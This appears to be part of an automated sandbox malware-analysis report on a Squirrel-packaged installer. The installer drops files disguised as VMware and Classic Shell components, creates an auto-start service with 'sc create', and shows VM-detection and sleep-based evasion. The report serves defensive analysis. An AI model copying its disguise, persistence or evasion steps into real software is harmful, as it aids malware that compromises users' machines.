          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Start Menu Settings.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Start Screen.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShell.chmJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\pack01.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PostWalletJump to behavior
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic file information: File size 6569472 > 1048576
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x619000
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, FilePost?a.exe, 00000004.00000002.3858763537.000000006E391000.00000020.00000001.01000000.00000009.sdmp, FilePost?a.exe, 00000008.00000002.3858762476.000000006E391000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.3.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup64\ClassicExplorer64.pdb source: ClassicExplorer64.dll.13.dr
          Source: Binary string: MpCmdRun.pdbGCTL source: ClassicIE_64.exe.13.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicStartMenu\Setup64\ClassicStartMenuDLL.pdb source: ClassicStartMenuDLL.dll.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicShellUpdate\Release\ClassicShellUpdate.pdb source: ClassicShellUpdate.exe.13.dr
          Source: Binary string: MpCmdRun.pdb source: ClassicIE_64.exe.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup\ClassicIEDLL_32.pdb source: ClassicIEDLL_32.dll.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup\ClassicIEDLL_32.pdb, source: ClassicIEDLL_32.dll.13.dr
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdbO source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb source: ClassicExplorerSettings.exe.13.dr
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb-- source: Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000000.2034521406.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000002.3858109335.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000000.2047188173.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.3.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdb source: ClassicExplorer32.dll.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb`BXt< source: ClassicExplorerSettings.exe.13.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 00023948209303294#U00ac320302282349843984903.exe
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdb source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb source: Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000000.2034521406.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000002.3858109335.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000000.2047188173.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.3.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdbL@ source: ClassicExplorer32.dll.13.dr
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\BasicInformation\x64\Release\BasicSomate.pdb source: ClassicIEDLL_64.dll.13.dr
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: ClassicIE_64.exe.13.drStatic PE information: 0xF72C17BC [Mon May 30 02:06:52 2101 UTC]
          Source: Main.dll.8.drStatic PE information: section name: .didata
          Source: ClassicIE_64.dll.13.drStatic PE information: section name: .didata
          Source: ClassicIEDLL_64.dll.13.drStatic PE information: section name: _RDATA
          Source: ClassicIE_64.exe.13.drStatic PE information: section name: .didat
          Source: ClassicStartMenuDLL.dll.13.drStatic PE information: section name: text
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848E1D2A5 pushad ; iretd 3_2_00007FF848E1D2A6
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F4B688 push esp; retf 5F4Fh3_2_00007FF848F505D9
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F4B688 push ds; retf 5F4Fh3_2_00007FF848F5060F
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F47967 push ebx; retf 3_2_00007FF848F4796A
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F300BD pushad ; iretd 3_2_00007FF848F300C1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF78200 push ecx; ret 4_2_6CF78213
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6E39F601 push ecx; ret 4_2_6E39F614
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6E39F800 push eax; ret 4_2_6E39F81E
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metro.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\Update.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vcruntime140.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to dropped file
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.logJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicShellReadme.rtfJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, IncJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Start Menu Settings.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED5EE0 Warning,Warning,strrchr,memset,GetModuleFileNameW,GetLastError,WSCSetApplicationCategory,WSCSetApplicationCategory,Warning,Warning,WSAStartup,WSAGetLastError,Warning,StartServiceCtrlDispatcherW,GetLastError,4_2_00ED5EE0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF7732C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_6CF7732C
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx-stats.exe vmware-vmx-stats.exe 4_2_00ED20B0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx-stats.exe VMware 4_2_00ED2480
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware Workstation VMware 4_2_00ED2450
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware VMware VMware 4_2_00ED2DF0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx.exe vmware-vmx.exe vmware-vmx-debug.exe vmware-vmx-stats.exe vmware-vmx-debug.exe vmware-vmx-debug.exe 4_2_00ED1FB0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware Authorization Service VMware Authorization Service 4_2_00ED3F80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware Server Console VMware Server Console 4_2_00ED3360
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx.exe vmware-vmx.exe 4_2_00ED4D00
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: 1A630000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile opened / queried: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeFile opened / queried: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.DLLJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Users\user\Desktop\VMware Workstation.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1793Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1301Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Metro.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to dropped file
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-35848
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeAPI coverage: 1.5 %
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7172Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7208Thread sleep count: 1793 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7212Thread sleep count: 1301 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 4040Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF93AFA FindFirstFileExW,4_2_6CF93AFA
          Source: C:\Windows\System32\rundll32.exeCode function: 13_2_00415080 FindFirstFileW,FindClose,13_2_00415080
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeCode function: 0_2_000E9ED6 VirtualQuery,GetSystemInfo,0_2_000E9ED6
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQuery_VMCI
          Source: FilePost?a.exe.3.drBinary or memory string: CompanyNameVMware, Inc.b
          Source: Update.exe, 00000003.00000002.2060372901.00000000027A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: LIB/NET48/VMWAREBASE.DLL
          Source: FilePost?a.exeBinary or memory string: \\.\pipe\vmware-authdpipe
          Source: FilePost?a.exe.3.drBinary or memory string: http://www.vmware.com/0
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetWriteAccess
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Workstation.lnk
          Source: FilePost?a.exe.3.drBinary or memory string: name="VMware.VMware.vmauthd"
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware-authd.exep^!
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetNumaNode
          Source: FilePost?a.exe.3.drBinary or memory string: PANIC: %s599 vmware-authd PANIC: %s
          Source: PostWallet-1.0.0-full.nupkgBinary or memory string: Rlib/net48/vmwarebase.dll
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetTags
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSPurge
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnkx.%
          Source: FilePost?a.exe.3.drBinary or memory string: 17.0.0 build-20800274VMware Workstation%s Authentication Daemon Version %u.%u for %s %s
          Source: FilePost?a.exe.3.drBinary or memory string: noreply@vmware.com0
          Source: FilePost?a.exe.3.drBinary or memory string: vmware
          Source: Update.exe, 00000003.00000002.2059737003.00000000007DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk,
          Source: FilePost?a.exe, 00000008.00000002.3857077776.00000000005CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.DLLB}
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_VMCISetFiltering
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSPurge
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ApplyReleasesImpl: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_QueryHGFS
